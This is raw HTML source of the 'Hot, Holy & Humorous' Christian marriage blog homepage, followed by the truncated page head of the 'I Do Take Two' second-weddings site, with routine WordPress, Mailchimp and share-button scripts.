id="uagb-style-frontend"></style> <link rel="icon" href="https://hotholyhumorous.com/wp-content/uploads/2015/12/cropped-HHH-Logo-JPG-32x32.jpg" sizes="32x32" /> <link rel="icon" href="https://hotholyhumorous.com/wp-content/uploads/2015/12/cropped-HHH-Logo-JPG-192x192.jpg" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://hotholyhumorous.com/wp-content/uploads/2015/12/cropped-HHH-Logo-JPG-180x180.jpg" /> <meta name="msapplication-TileImage" content="https://hotholyhumorous.com/wp-content/uploads/2015/12/cropped-HHH-Logo-JPG-270x270.jpg" /> <style type="text/css" id="wp-custom-css"> .hhh-social ul li a{ width:28px; height:28px; line-height:28px; } .hhh-social ul li a:before { transform:scale(.75,.75); line-height:28px; } .hhh-social ul li a.amazonauthor.icon-amazon:before { bottom:-2px; } </style> </head> <body class="home page-template page-template-page-templates page-template-hhhfront-page page-template-page-templateshhhfront-page-php page page-id-12225 wp-embed-responsive custom-font-enabled single-author"> <div class="preheader site"><div class="hhhsearch icon-search"><form role="search" method="get" id="searchform" class="searchform" action="https://hotholyhumorous.com/"> <div> <label class="screen-reader-text" for="s">Search for:</label> <input type="text" value="" name="s" id="s" /> <input type="submit" id="searchsubmit" value="Search" /> </div> </form></div></div> <div id="page" class="hfeed site"> <div class="banner-left"></div> <div class="banner-right"></div> <div class="body-wrapper"> <header id="masthead" class="site-header" role="banner"> <div id="medallion"> <hgroup> <h1 class="site-title"><a href="https://hotholyhumorous.com/" title="Hot, Holy &amp; Humorous" rel="home">Hot, Holy &amp; Humorous<span class="tagline">Sex &amp; Marriage by God's Design</span></a></h1> </hgroup> </div><!--end #medallion--> <nav id="site-navigation" class="main-navigation group row" role="navigation"> <div class="nav-left"><button class="menu-toggle">Menu</button> <a class="assistive-text" href="#content" title="Skip to content">Skip to content</a> <div class="menu-main-container"><ul id="menu-main" class="nav-menu"><li id="menu-item-12261" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-12225 current_page_item menu-item-12261"><a href="https://hotholyhumorous.com/" aria-current="page">Home</a></li> <li id="menu-item-8214" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-8214"><a href="https://hotholyhumorous.com/start-here/">Start Here</a> <ul class="sub-menu"> <li id="menu-item-5092" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5092"><a href="https://hotholyhumorous.com/bio/">Bio</a></li> <li id="menu-item-1767" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1767"><a href="https://hotholyhumorous.com/personal-testimony/">My Story</a></li> <li id="menu-item-1768" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1768"><a href="https://hotholyhumorous.com/what-i-believe/">What I Believe</a></li> <li id="menu-item-26012" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26012"><a href="https://hotholyhumorous.com/subscribe-2/">Subscribe</a></li> </ul> </li> <li id="menu-item-25627" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-25627"><a href="https://hotholyhumorous.com/blog">Blog</a> <ul class="sub-menu"> <li id="menu-item-1766" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1766"><a href="https://hotholyhumorous.com/guest-posts/">Guest Posts</a></li> <li id="menu-item-8199" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8199"><a href="https://hotholyhumorous.com/recommended-reads/">Recommended Reads</a></li> </ul> </li> <li id="menu-item-2475" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2475"><a href="https://hotholyhumorous.com/books/">Books</a></li> <li id="menu-item-12312" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-12312"><a href="https://hotholyhumorous.com/want-j-to-speak-at-your-event/">Speaking</a> <ul class="sub-menu"> <li id="menu-item-25280" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-25280"><a href="https://hotholyhumorous.com/upcoming-events/">Upcoming Events</a></li> </ul> </li> <li id="menu-item-24990" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-24990"><a href="https://hotholyhumorous.com/policies/">Policies</a> <ul class="sub-menu"> <li id="menu-item-1765" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1765"><a href="https://hotholyhumorous.com/about-comments/">Comments</a></li> <li id="menu-item-24991" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-24991"><a href="https://hotholyhumorous.com/privacy-policy/">Privacy</a></li> </ul> </li> <li id="menu-item-25495" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-25495"><a href="https://hotholyhumorous.com/topics/">Topics</a> <ul class="sub-menu"> <li id="menu-item-25490" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-25490"><a href="https://hotholyhumorous.com/category/the-bible-and-sex/">The Bible and Sex</a> <ul class="sub-menu"> <li id="menu-item-25482" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25482"><a href="https://hotholyhumorous.com/category/praying-for-marriage-bed/">Praying for Marriage Bed</a></li> </ul> </li> <li id="menu-item-25469" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25469"><a href="https://hotholyhumorous.com/category/birth-control/">Birth Control</a></li> <li id="menu-item-25471" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25471"><a href="https://hotholyhumorous.com/category/current-issues-in-sexuality/">Current Issues in Sexuality</a></li> <li id="menu-item-25578" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-25578"><a href="https://hotholyhumorous.com/category/for-wives/">For Wives</a> <ul class="sub-menu"> <li id="menu-item-25470" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25470"><a href="https://hotholyhumorous.com/category/body-image-2/">Body Image</a></li> <li id="menu-item-25472" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25472"><a href="https://hotholyhumorous.com/category/feel-beautiful/">Feel Beautiful Series</a></li> <li id="menu-item-25475" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25475"><a href="https://hotholyhumorous.com/category/male-perspective-of-sex-guest-posts/">Male View of Sex Series</a></li> </ul> </li> <li id="menu-item-25473" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25473"><a href="https://hotholyhumorous.com/category/higher-drive-wives/">Higher Drive Wives</a></li> <li id="menu-item-25474" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-25474"><a href="https://hotholyhumorous.com/category/how-to-tips/">How To Tips</a> <ul class="sub-menu"> <li id="menu-item-25576" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25576"><a href="https://hotholyhumorous.com/category/oral-sex/">Oral Sex</a></li> <li id="menu-item-25577" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25577"><a href="https://hotholyhumorous.com/category/orgasm/">Orgasm</a></li> <li id="menu-item-25484" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25484"><a href="https://hotholyhumorous.com/category/sex-and-parenting/">Sex and Parenting</a></li> </ul> </li> <li id="menu-item-25476" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-25476"><a href="https://hotholyhumorous.com/category/marriage-general/">Marriage &#8211; General</a> <ul class="sub-menu"> <li id="menu-item-25478" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25478"><a href="https://hotholyhumorous.com/category/marriage-and-sex-research/">Marriage and Sex Research</a></li> <li id="menu-item-25479" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25479"><a href="https://hotholyhumorous.com/category/marriage-blogging-2/">Marriage Blogging</a></li> <li id="menu-item-25477" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25477"><a href="https://hotholyhumorous.com/category/marriage-and-sex-humor/">Marriage and Sex Humor</a></li> <li id="menu-item-25480" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25480"><a href="https://hotholyhumorous.com/category/marriage-memory-verses/">Marriage Memory Verses</a></li> </ul> </li> <li id="menu-item-25483" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25483"><a href="https://hotholyhumorous.com/category/q-a-with-j/">Q &#038; A with J</a></li> <li id="menu-item-25575" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-25575"><a href="https://hotholyhumorous.com/category/sex-and-marriage-problems/">Sex &#038; Marriage Problems</a> <ul class="sub-menu"> <li id="menu-item-25468" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25468"><a href="https://hotholyhumorous.com/category/adultery/">Adultery</a></li> <li id="menu-item-25481" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25481"><a href="https://hotholyhumorous.com/category/porn-recovery/">Porn Recovery</a></li> <li id="menu-item-25487" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25487"><a href="https://hotholyhumorous.com/category/sexual-abuse/">Sexual Abuse</a></li> </ul> </li> <li id="menu-item-25485" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25485"><a href="https://hotholyhumorous.com/category/sex-chat-for-christian-wives-podcast/">Sex Chat for Christian Wives Podcast</a></li> <li id="menu-item-25486" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25486"><a href="https://hotholyhumorous.com/category/sex-research-for-marriage/">Sex Research for Marriage</a></li> <li id="menu-item-25488" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25488"><a href="https://hotholyhumorous.com/category/sexual-intimacy-encouragement/">Sexual Intimacy Encouragement</a></li> <li id="menu-item-25489" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25489"><a href="https://hotholyhumorous.com/category/sexuality-and-health/">Sexuality and Health</a></li> </ul> </li> <li id="menu-item-1781" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1781"><a href="https://hotholyhumorous.com/contact/">Contact</a></li> </ul></div></div> <div class="nav-right"> <nav role="navigation" class="hhh-social"> <ul> <li><a href="https://www.amazon.com/J.-Parker/e/B00GXAD8Z0/ref=dp_byline_cont_book_1" class="amazonauthor icon-amazon" target="_blank"><span>amazon author page</span></a></li> <li><a href="https://www.facebook.com/hotholyandhumorous" class="facebook icon-facebook" target="_blank"><span>facebook</span></a></li> <li><a href="http://pinterest.com/HotHolyHumorous/" class="pinterest icon-pinterest" target="_blank"><span>pinterest</span></a></li> <li><a href="https://hotholyhumorous.com/feed" class="rss icon-rss" target="_blank"><span>rss</span></a></li> <li><a href="https://twitter.com/HotHolyHumorous" class="twitter icon-twitter" target="_blank"><span>twitter</span></a></li> </ul> </nav><!--end .hiwassee-social--> </div> </nav><!-- #site-navigation --> </header><!-- #masthead --> <div id="main" class="wrapper"> <div id="primary" class="home"> <div id="content" role="main" class="row group"> <article id="post-12225" class="post-12225 page type-page status-publish has-post-thumbnail hentry"> <div class="entry-content"> <blockquote class="wp-block-quote is-style-large"><p>God wants you to have a great sex life!</p></blockquote> <div class="wp-block-image"><figure class="alignright is-resized"><img src="https://hotholyhumorous.com/wp-content/uploads/2015/02/HHH-Photo-Official.jpg" alt="" class="wp-image-5113" width="200" height="300"/><figcaption>J. Parker</figcaption></figure></div> <ul><li>Struggling to embrace your God-given sexuality?</li><li>Unsure how to get your spouse on board?</li><li>Looking for sex tips that align with godliness?</li></ul> <p>If any of those describe you, welcome!</p> <p>While sex is a significant part of marriage, it&#8217;s not always easy to navigate or nurture. <em>Hot, Holy &amp; Humorous</em> provides information, encouragement, and resources to help you experience the best sexual intimacy you can have—sex in marriage as God designed it to be. Take a look around, find resources that address your marriage&#8217;s needs, and begin improving your sex life today!</p> </div> </article><!-- #post --> </div><!-- #content --> <div class="home-links row group"> <div class="left third"><div class="equal-third"><aside id="text-7" class="widget widget_text home-third"><h3 class="widget-title">Blog</h3><div class="inner"> <div class="textwidget"><p>Over 850 blog posts on topics from from the Bible’s perspective of sex to romancing your spouse to specific sexual techniques, with more than 150 reader questions answered. New posts added weekly.</p> </div> </div></aside></div><span class="button-wrap"><a href="https://hotholyhumorous.com/blog" class="button home-feature" href="">Visit Blog</a></span></div> <div class="center third"><div class="equal-third"><aside id="text-8" class="widget widget_text home-third"><h3 class="widget-title">Books</h3><div class="inner"> <div class="textwidget"><p>Books about sex from a Christian point of view that have been described as “practical,” “God-honoring,” “helpful,” “honest,” and “hilarious.” Learn more about how to have a great sex life by checking out J's books!</p> </div> </div></aside></div><span class="button-wrap"><a href="https://hotholyhumorous.com/books/" class="button home-feature" href="">View Books</a></span></div> <div class="right third"><div class="equal-third"><aside id="text-9" class="widget widget_text home-third"><h3 class="widget-title">Speaking</h3><div class="inner"> <div class="textwidget"><p>Learn, laugh, and take away practical tips for improving the sexual intimacy in your marriage. Many shy away from talking about sex, but J. Parker would love to speak boldly and biblically at your next event.</p> </div> </div></aside></div><span class="button-wrap"><a href="https://hotholyhumorous.com/want-j-to-speak-at-your-event/" class="button home-feature" href="">Learn More</a></span></div> </div><!--end.home-links--> <div class="home-end row group"> <div class="end-left end-equal"> <h3>Subscribe</h3> <div class="inner"><p class="cta">Sign up to receive regular blog posts and/or my monthly newsletter. Your information will be kept private and protected.</p> <!-- Begin MailChimp Signup Form --> <div id="mc_embed_signup"> <form action="//hotholyhumorous.us7.list-manage.com/subscribe/post?u=8a6952e91fca020a249bec68e&amp;id=4383869de0" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate> <div id="mc_embed_signup_scroll"> <div class="mcleft"><div class="mc-field-group"> <label for="mce-EMAIL">Email Address <span class="asterisk">*</span> </label> <input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL"> </div> <div class="clear mc-button"><input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button"></div></div> <div class="mcright"><div class="mc-field-group input-group"> <strong>Send me... </strong> <ul><li><input type="checkbox" value="4" name="group[7189][4]" id="mce-group[7189]-7189-0" checked><label for="mce-group[7189]-7189-0">Latest blog posts and monthly newsletter</label></li> <li><input type="checkbox" value="1" name="group[7189][1]" id="mce-group[7189]-7189-1"><label for="mce-group[7189]-7189-1">Only latest blog posts</label></li> <li><input type="checkbox" value="2" name="group[7189][2]" id="mce-group[7189]-7189-2"><label for="mce-group[7189]-7189-2">Only monthly newsletter</label></li> </ul> </div></div> <div id="mce-responses" class="clear"> <div class="response" id="mce-error-response" style="display:none"></div> <div class="response" id="mce-success-response" style="display:none"></div> </div> <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups--> <div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_8a6952e91fca020a249bec68e_4383869de0" tabindex="-1" value=""></div> </div> </form> </div> <script type='text/javascript' src='//s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js'></script><script type='text/javascript'>(function($) {window.fnames = new Array(); window.ftypes = new Array();fnames[0]='EMAIL';ftypes[0]='email';fnames[1]='FNAME';ftypes[1]='text';fnames[2]='LNAME';ftypes[2]='text';}(jQuery));var $mcj = jQuery.noConflict(true);</script> <!--End mc_embed_signup--> </div> </div> <div class="end-right end-equal"> <div class="end-inner"> </div> </div> </div><!--end.home-end--> </div><!-- #primary --> </div><!-- #main .wrapper --> <footer id="colophon" role="contentinfo"> <div class="site-info"> <p><span class="copy">&copy;</span> 2010-2019 Hot, Holy &amp; Humorous</p> <p class="credit"><a href="http://www.memphismckay.com">Site Design by Memphis McKay</a></p> </div><!-- .site-info --> </footer><!-- #colophon --> </div><!--end body-wrapper--> </div><!-- #page --> <!--[if lt IE 10]><script src="https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/js/wpimagehover-ie.js"></script><![endif]--> <script type="text/javascript"> function atomicBlocksShare( url, title, w, h ){ var left = ( window.innerWidth / 2 )-( w / 2 ); var top = ( window.innerHeight / 2 )-( h / 2 ); return window.open(url, title, 'toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=no, resizable=no, copyhistory=no, width=600, height=600, top='+top+', left='+left); } </script> <div style="display:none"> </div> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/themes/HotHolyHumorous/js/min/footer-min.js?ver=2.0.0'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/ultimate-addons-for-gutenberg/assets/js/timeline.js?ver=1.13.3'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/ultimate-addons-for-gutenberg/assets/js/post-carousel.js?ver=1.13.3'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/click-to-tweet/js/ctt-script.js?ver=1.0.0'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/simple-share-buttons-adder/js/ssba.js?ver=5.2'></script> <script type='text/javascript'> Main.boot( [] ); </script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/js/wpimagehover.js?ver=5.2'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/Sharrre-master/jquery.sharrre.min.js?ver=5.2'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/atomic-blocks/dist/assets/js/dismiss.js?ver=1556864395'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=5.2'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/themes/twentytwelve/js/navigation.js?ver=20140711'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/official-mailerlite-sign-up-forms/assets/js/jquery.validate.min.js?ver=5.2'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'58452694',post:'12225',tz:'-5',srv:'hotholyhumorous.com'} ]); _stq.push([ 'clickTrackerInit', '58452694', '12225' ]); </script> <script> jQuery(window).load(function($){ jQuery('.wpimagehover').wpimagehover({ 'animation' : 'fade', 'socialType' : 'colored', 'socialStyle' : 'circle' }); jQuery('.wpimagehover-socials a').on('click',function(e){ e.preventDefault(); }); jQuery('.wpimagehover-twitter').sharrre({ share: { twitter: true }, urlCurl: "https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/Sharrre-master/sharrre.php", enableHover: false, enableTracking: false, enableCounter: false, buttons: { }, click: function(api, options){ api.simulateClick(); api.openPopup('twitter'); } }); jQuery('.wpimagehover-facebook').sharrre({ share: { facebook: true }, urlCurl: "https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/Sharrre-master/sharrre.php", enableHover: false, enableTracking: false, enableCounter: false, buttons: { }, click: function(api, options){ api.simulateClick(); api.openPopup('facebook'); } }); jQuery('.wpimagehover-linkedin').sharrre({ share: { facebook: true }, urlCurl: "https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/Sharrre-master/sharrre.php", enableHover: false, enableTracking: false, enableCounter: false, buttons: { }, click: function(api, options){ api.simulateClick(); api.openPopup('linkedin'); } }); jQuery('.wpimagehover-pinterest').sharrre({ share: { facebook: true }, urlCurl: "https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/Sharrre-master/sharrre.php", enableHover: false, enableTracking: false, enableCounter: false, buttons: { }, click: function(api, options){ options.buttons.pinterest.description = jQuery(this).get(0).text; options.buttons.pinterest.media = jQuery(this).get(0).title; api.simulateClick(); api.openPopup('pinterest'); } }); jQuery('.wpimagehover-googleplus').sharrre({ share: { googlePlus: true }, urlCurl: "https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/Sharrre-master/sharrre.php", enableHover: false, enableTracking: false, enableCounter: false, buttons: { }, click: function(api, options){ api.simulateClick(); api.openPopup('googlePlus'); } }); jQuery('.wpimagehover-digg').sharrre({ share: { digg: true }, urlCurl: "https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/Sharrre-master/sharrre.php", enableHover: false, enableTracking: false, enableCounter: false, buttons: { }, click: function(api, options){ api.simulateClick(); api.openPopup('digg'); } }); jQuery('.wpimagehover-delicious').sharrre({ share: { delicious: true }, urlCurl: "https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/Sharrre-master/sharrre.php", enableHover: false, enableTracking: false, enableCounter: false, buttons: { }, click: function(api, options){ api.simulateClick(); api.openPopup('delicious'); } }); jQuery('.wpimagehover-stumbleupon').sharrre({ share: { stumbleupon: true }, urlCurl: "https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/Sharrre-master/sharrre.php", enableHover: false, enableTracking: false, enableCounter: false, buttons: { }, click: function(api, options){ api.simulateClick(); api.openPopup('stumbleupon'); } }); }); </script> <style type="text/css"> .wpimagehover-wrapper .wpimagehover-overlay{ background-color: #2C3F5C; } </style> <script type="text/javascript" id="uagb-script-frontend"> ( function( $ ) { })(jQuery) </script> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Page Caching using disk: enhanced Served from: hotholyhumorous.com @ 2019-05-16 09:45:21 by W3 Total Cache -->
0
<!DOCTYPE html> <html class="no-js" itemscope itemtype="https://schema.org/WebPage" lang="en-US"> <head> <!-- Site Meta --> <meta charset="UTF-8"> <link rel="pingback" href="http://www.idotaketwo.com/blog/xmlrpc.php"> <meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=yes"> <!-- End Site Meta --> <title>Second Wedding, Remarriage, Second Marriages, &amp; Vow Renewal</title> <!-- Open Graph Meta Tags generated by MashShare 3.6.4 - https://mashshare.net --> <meta property="og:type" content="article" /> <meta property="og:title" content="Second Wedding, Remarriage, Second Marriages, & Vow Renewal" /> <meta property="og:description" content="Second Wedding Ideas for Your Remarriage. Everything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals. There are a lot of things that are actually kind of fantastic the second time around, not" /> <meta property="og:url" content="https://www.idotaketwo.com/blog/home/" /> <meta property="og:site_name" content="I Do Take Two" /> <meta property="article:publisher" content="https://www.facebook.com/pages/Idotaketwocom/157279667807124" /> <meta property="article:published_time" content="2014-01-05T18:06:30+00:00" /> <meta property="article:modified_time" content="2017-05-19T15:11:45+00:00" /> <meta property="og:updated_time" content="2017-05-19T15:11:45+00:00" /> <!-- Open Graph Meta Tags generated by MashShare 3.6.4 - https://www.mashshare.net --> <!-- Twitter Card generated by MashShare 3.6.4 - https://www.mashshare.net --> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="Second Wedding, Remarriage, Second Marriages, & Vow Renewal"> <meta name="twitter:description" content="Second Wedding Ideas for Your Remarriage. Everything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals. There are a lot of things that are actually kind of fantastic the second time around, not"> <!-- Twitter Card generated by MashShare 3.6.4 - https://www.mashshare.net --> <!-- Open Graph Meta Tags generated by MashShare 3.6.4 - https://mashshare.net --> <meta property="og:type" content="article" /> <meta property="og:title" content="Home" /> <meta property="og:description" content="Second Wedding Ideas for Your Remarriage. Everything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals. There are a lot of things that are actually kind of fantastic the second time around, not" /> <meta property="og:url" content="https://www.idotaketwo.com/blog/home/" /> <meta property="og:site_name" content="I Do Take Two" /> <meta property="article:published_time" content="2014-01-05T18:06:30+00:00" /> <meta property="article:modified_time" content="2017-05-19T15:11:45+00:00" /> <meta property="og:updated_time" content="2017-05-19T15:11:45+00:00" /> <!-- Open Graph Meta Tags generated by MashShare 3.6.4 - https://www.mashshare.net --> <!-- Twitter Card generated by MashShare 3.6.4 - https://www.mashshare.net --> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="Home"> <meta name="twitter:description" content="Second Wedding Ideas for Your Remarriage. Everything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals. There are a lot of things that are actually kind of fantastic the second time around, not"> <!-- Twitter Card generated by MashShare 3.6.4 - https://www.mashshare.net --> <!-- Open Graph Meta Tags generated by MashShare 3.6.4 - https://mashshare.net --> <meta property="og:type" content="article" /> <meta property="og:title" content="Home" /> <meta property="og:description" content="Second Wedding Ideas for Your Remarriage. Everything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals. There are a lot of things that are actually kind of fantastic the second time around, not" /> <meta property="og:url" content="https://www.idotaketwo.com/blog/home/" /> <meta property="og:site_name" content="I Do Take Two" /> <meta property="article:published_time" content="2014-01-05T18:06:30+00:00" /> <meta property="article:modified_time" content="2017-05-19T15:11:45+00:00" /> <meta property="og:updated_time" content="2017-05-19T15:11:45+00:00" /> <!-- Open Graph Meta Tags generated by MashShare 3.6.4 - https://www.mashshare.net --> <!-- Twitter Card generated by MashShare 3.6.4 - https://www.mashshare.net --> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="Home"> <meta name="twitter:description" content="Second Wedding Ideas for Your Remarriage. Everything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals. There are a lot of things that are actually kind of fantastic the second time around, not"> <!-- Twitter Card generated by MashShare 3.6.4 - https://www.mashshare.net --> <!-- This site is optimized with the Yoast SEO plugin v11.2 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="There are a lot of things that are actually kind of fantastic the second time around, not the least of which are second weddings and vow renewal ceremonies. So, now that you’ve found the proverbial needle in the haystack for a second time, or have decided to recommit yourself to the one you love... what to do? Celebrate, that’s what!"/> <link rel="canonical" href="https://www.idotaketwo.com/blog/home/" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.idotaketwo.com/blog/#organization","name":"","url":"https://www.idotaketwo.com/blog/","sameAs":["https://www.facebook.com/pages/Idotaketwocom/157279667807124","http://pinterest.com/weddingqueen/","https://twitter.com/IDoTakeTwo"]},{"@type":"WebSite","@id":"https://www.idotaketwo.com/blog/#website","url":"https://www.idotaketwo.com/blog/","name":"I Do Take Two","publisher":{"@id":"https://www.idotaketwo.com/blog/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.idotaketwo.com/blog/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.idotaketwo.com/blog/home/#webpage","url":"https://www.idotaketwo.com/blog/home/","inLanguage":"en-US","name":"Second Wedding, Remarriage, Second Marriages, &amp; Vow Renewal","isPartOf":{"@id":"https://www.idotaketwo.com/blog/#website"},"datePublished":"2014-01-05T18:06:30+00:00","dateModified":"2017-05-19T19:11:45+00:00","description":"There are a lot of things that are actually kind of fantastic the second time around, not the least of which are second weddings and vow renewal ceremonies. So, now that you\u2019ve found the proverbial needle in the haystack for a second time, or have decided to recommit yourself to the one you love... what to do? Celebrate, that\u2019s what!"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s.glam.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="I Do Take Two &raquo; Feed" href="https://www.idotaketwo.com/blog/feed/" /> <link rel="alternate" type="application/rss+xml" title="I Do Take Two &raquo; Comments Feed" href="https://www.idotaketwo.com/blog/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="I Do Take Two &raquo; Home Comments Feed" href="https://www.idotaketwo.com/blog/home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.idotaketwo.com\/blog\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var 